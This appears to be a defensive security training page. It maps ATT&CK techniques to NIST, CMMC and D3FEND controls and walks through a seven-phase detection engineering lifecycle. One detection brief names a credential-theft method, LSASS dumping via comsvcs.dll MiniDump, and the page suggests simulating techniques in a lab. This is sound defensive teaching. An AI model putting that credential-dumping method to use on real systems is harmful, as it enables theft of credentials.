SC-7 Boundary ProtectionSI-4 System MonitoringAC-4 Information Flow EnforcementAU-12 Audit Generation
CMMC Level 2
SC.L1-3.13.1AC.L2-3.1.3AU.L2-3.3.1
DoD 8140 Work Roles
531 Cyber Defense Incident Responder
T1490 Inhibit System Recovery
NIST SP 800-53
CP-9 System BackupCP-10 System RecoverySI-4 System Monitoring
CMMC Level 2
CP.L2-3.8.9RE.L2-3.13.16
DoD 8140 Work Roles
531 Cyber Defense Incident Responder
T1110 Brute Force
NIST SP 800-53
IA-5 Authenticator ManagementAC-7 Unsuccessful Logon AttemptsSI-4 System Monitoring
CMMC Level 2
IA.L2-3.5.7AC.L2-3.1.8SI.L2-3.14.6
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1558 Steal/Forge Kerberos Tickets
NIST SP 800-53
IA-5 Authenticator ManagementAC-6 Least PrivilegeAU-2 Audit Events
CMMC Level 2
IA.L2-3.5.7AC.L2-3.1.5AU.L2-3.3.1
DoD 8140 Work Roles
511 Cyber Defense Analyst531 Cyber Defense Incident Responder
T1003.006 DCSync
NIST SP 800-53
AC-6 Least PrivilegeAU-2 Audit EventsSI-4 System MonitoringAC-3 Access Enforcement
CMMC Level 2
AC.L2-3.1.5AU.L2-3.3.1SI.L2-3.14.6
DoD 8140 Work Roles
531 Cyber Defense Incident Responder
T1649 Steal/Forge Authentication Certs (ADCS)
NIST SP 800-53
IA-5 Authenticator ManagementSC-17 PKI CertificatesAU-2 Audit Events
CMMC Level 2
IA.L2-3.5.7SC.L2-3.13.10
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1098 Account Manipulation
NIST SP 800-53
AC-2 Account ManagementAU-12 Audit GenerationAC-6 Least Privilege
CMMC Level 2
AC.L2-3.1.1AU.L2-3.3.1AC.L2-3.1.5
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1105 Ingress Tool Transfer
NIST SP 800-53
SC-7 Boundary ProtectionSI-3 Malicious Code ProtectionSI-4 System Monitoring
CMMC Level 2
SC.L1-3.13.1SI.L1-3.14.2SI.L2-3.14.6
DoD 8140 Work Roles
511 Cyber Defense Analyst531 Cyber Defense Incident Responder

๐Ÿ›ก๏ธ MITRE D3FEND Defensive Mappings 18 techniques

For each ATT&CK offensive technique, the corresponding MITRE D3FEND defensive countermeasures. D3FEND categorizes defenses into Harden (prevent), Detect (find), Isolate (contain), Evict (remove), and Restore (recover). Use this view to demonstrate that your detection coverage maps to a complete defensive posture.

18 of 18
T1078 Valid Accounts
D3-MFA Multi-factor Authentication Harden
D3-ANAA Authentication Cache Invalidation Evict
D3-UBA User Behavior Analysis Detect
D3-UDTA User Data Transfer Analysis Detect
T1059 Command and Scripting Interpreter
D3-EAL Executable Allowlisting Harden
D3-PSA Process Spawn Analysis Detect
D3-SCA System Call Analysis Detect
D3-SSA Shell Session Activity Analysis Detect
T1190 Exploit Public-Facing Application
D3-AH Application Hardening Harden
D3-NTA Network Traffic Analysis Detect
D3-WAF Web Application Firewall Isolate
D3-IPCTF IP-based Network Traffic Filtering Isolate
T1566 Phishing
D3-MA Message Authentication (DKIM/SPF/DMARC) Harden
D3-MFA Multi-factor Authentication Harden
D3-MENCR Message Encryption Harden
D3-MAA Message Analysis Detect
T1003 OS Credential Dumping
D3-CH Credential Hardening Harden
D3-PA Process Analysis Detect
D3-MA Memory Analysis Detect
D3-CGUARD Credential Guard / Memory Protection Harden
T1486 Data Encrypted for Impact
D3-FBA File Backup Authorization Harden
D3-FA File Analysis Detect
D3-FCD File Content Detonation Detect
D3-RD Restore Data (Backups) Restore
T1547.001 Registry Run Keys
D3-RA Registry Analysis Detect
D3-FBA File Behavior Analysis Detect
D3-PA Process Analysis Detect
T1053 Scheduled Task/Job
D3-SJA Scheduled Job Analysis Detect
D3-PA Process Analysis Detect
D3-EAL Executable Allowlisting Harden
T1021 Remote Services
D3-MFA Multi-factor Authentication Harden
D3-NTA Network Traffic Analysis Detect
D3-IBCA Inbound Connection Analysis Detect
D3-NTF Network Traffic Filtering Isolate
T1562 Impair Defenses
D3-PA Process Analysis Detect
D3-SSC System Service Configuration Harden
D3-LFP Local File Permissions Harden
D3-SICA System Init Config Analysis Detect
T1027 Obfuscated Files or Information
D3-FA File Analysis Detect
D3-FCA File Content Analysis Detect
D3-FCDC File Carving Detect
D3-DA Dynamic Analysis (Sandbox) Detect
T1071 Application Layer Protocol
D3-NTA Network Traffic Analysis Detect
D3-DNSDL DNS Denylisting Isolate
D3-CA Connection Attempt Analysis Detect
D3-PHDURA Protocol Header Discrepancy Analysis Detect
T1567 Exfiltration Over Web Service
D3-NTA Network Traffic Analysis Detect
D3-OTF Outbound Traffic Filtering Isolate
D3-DLPB Data Loss Prevention - Block Isolate
T1490 Inhibit System Recovery
D3-FBA File Backup Authorization Harden
D3-SBA System Backup Authorization Harden
D3-RD Restore Data Restore
T1110 Brute Force
D3-MFA Multi-factor Authentication Harden
D3-AL Account Locking Isolate
D3-UBA User Behavior Analysis Detect
D3-CR Credential Rotation Harden
T1558 Steal/Forge Kerberos Tickets
D3-CH Credential Hardening Harden
D3-CGUARD Credential Guard Harden
D3-CR Credential Rotation (krbtgt) Harden
D3-AAA Authentication Attempt Analysis Detect
T1098 Account Manipulation
D3-UAP User Account Permissions Harden
D3-UBA User Behavior Analysis Detect
D3-UAM User Account Monitoring Detect
T1105 Ingress Tool Transfer
D3-NTA Network Traffic Analysis Detect
D3-FA File Analysis Detect
D3-OTF Outbound Traffic Filtering Isolate
D3-EAL Executable Allowlisting Harden

🔄 Detection Engineering Lifecycle Guide 7 phases

The 7-phase workflow used by mature detection engineering teams. Hypothesis → Data Availability → Query Development → Test & Validate → Tune & Deploy → Document & Train → Maintain & Retire. Walk through this in interviews to demonstrate detection engineering maturity.

The 7-Phase Detection Engineering Lifecycle

A detection isn't done when it's written. Every rule lives through 7 phases, and most of them happen after deployment. This is the workflow used by mature detection engineering teams (Elastic, Datadog, Microsoft, the open-source SigmaHQ project). Use it to drive your own rule development and explain your process in interviews.

Phase 1: Hypothesis

"What attacker behavior do I want to detect, and why?"

What you do

  • Pick a specific MITRE ATT&CK technique (e.g., T1003.001 LSASS Memory)
  • Define the threat actor / scenario context (ransomware operator post-foothold? APT pre-credential-theft?)
  • Identify the observable: what would actually appear in logs when this happens?
  • Document the assumptions: what data sources you require, what platforms, what attack stage

Output

A detection brief: "Detect LSASS access via comsvcs.dll MiniDump invocation by non-approved processes"

⚠️ Skipping this phase is the #1 cause of low-quality, high-FP detections. Specificity wins.

Phase 2: Data Availability

"Do I have the logs to actually see this?"

What you do

  • Identify required data sources (Sysmon EID 10? Windows Security 4688? PowerShell ScriptBlock 4104?)
  • Verify the logs are being collected, parsed, and ingested (not just turned on at endpoints)
  • Test on a known-good system: trigger the technique safely, confirm the event appears in your SIEM
  • If data is missing, escalate (GPO change, EDR config, log shipping fix) BEFORE writing the rule

Output

A confirmed evidence chain: technique → log source → field availability → SIEM index

💡 Use Atomic Red Team to safely generate the events you're targeting in a lab; this confirms data presence before you commit.

Phase 3: Query Development

"Write the actual detection logic, and write it right."

What you do

  • Write the detection in your portable format first (Sigma); convert to platform-specific later
  • Start narrow: match the specific behavior, not adjacent broad patterns
  • Use both inclusion (target this) and exclusion (filter known-good) clauses
  • Cite sources in comments: MITRE technique, related threat reports, your hypothesis brief
  • Save the original brief alongside the rule; the "why" is as important as the "what"

Output

A Sigma YAML rule with metadata, MITRE tags, references, and a clear detection block

📜 Sigma first means your detection survives SIEM migrations. The rule is intellectual property; don't tie it to one vendor.

Phase 4: Test & Validate

"Prove it actually fires, and only fires when it should."

What you do

  • Run the Atomic Red Team test (or equivalent) for the target technique → verify the rule triggers
  • Run common false-positive scenarios → verify the rule does NOT trigger
  • Test on representative endpoint diversity (workstation vs. server vs. DC vs. dev box)
  • Document the test cases, including specific commands and expected outcomes
  • Quantify: against your data, how many hits per day? Acceptable rate is <5/day for high-fidelity rules.

Output

A test report: which atomics passed/failed, what FPs you encountered, baseline hit rate

🧪 Untested detections are aspirational, not real. Tested + tuned detections are real.

Phase 5: Tune & Deploy

"Reduce noise. Document FPs. Push to production."

What you do

  • Add suppressions for legitimate triggers found in testing (e.g., specific service accounts, software vendors)
  • Document EVERY exclusion with a comment explaining why it's safe
  • Set rule severity, response SLA, and on-call routing in the SIEM
  • Stage deployment: dev → small canary → broad production
  • Update the playbook card with current rule version + validated date

Output

A production rule with documented exclusions, ownership, and runbook reference

⚖️ Goal: signal-to-noise ratio > 10:1. Detections that wake up the on-call for false positives 3 times burn out the SOC.

Phase 6: Document & Train

"Make the alert actionable for whoever responds."

What you do

  • Write a runbook: what is this alert? What does the analyst do FIRST? What are the FP investigation steps?
  • Link the runbook from the alert itself (Sentinel, Splunk, Elastic all support this)
  • Train the SOC team: walk through the detection, the FP patterns, the response steps
  • Add the rule to your central detection library / GitHub repo with the runbook

Output

A runbook in the alert: hypothesis, indicators of compromise, response actions, escalation criteria

📖 An undocumented detection becomes a ticket nobody knows how to handle. Documentation IS the detection.

Phase 7: Maintain & Retire

"Detections rot. Plan for the lifecycle end."

What you do

  • Quarterly review: still firing? still relevant? still high-fidelity?
  • Track metrics: hits/week, true positive rate, time-to-tune
  • When attackers change behavior (e.g., they stop using the targeted LOLBin), update or retire
  • Track CVEs and threat intel that obsolete or revive detections
  • Decommission cleanly: archive the rule, remove from production, update playbook with retirement date

Output

A maintenance log per rule: revision history, performance metrics, retirement decision

⏱️ Average detection rule shelf-life is 12-18 months before requiring meaningful changes. Plan for it.

🎯 Why This Matters for Your Career

Detection Engineer interviews, especially at mature shops like Mandiant, CrowdStrike, Elastic, Datadog, and the cleared-environment contractors, will ask you to walk through this process. Knowing the phases and being able to articulate "I wrote a Sigma rule for T1003.001, here's how I tested it with Atomic Red Team #1, here's the FP I found and how I tuned it" is the difference between a generalist analyst and a Detection Engineer.

The phases are also a checklist: when you're stuck on a detection problem, find which phase you're in and follow the workflow.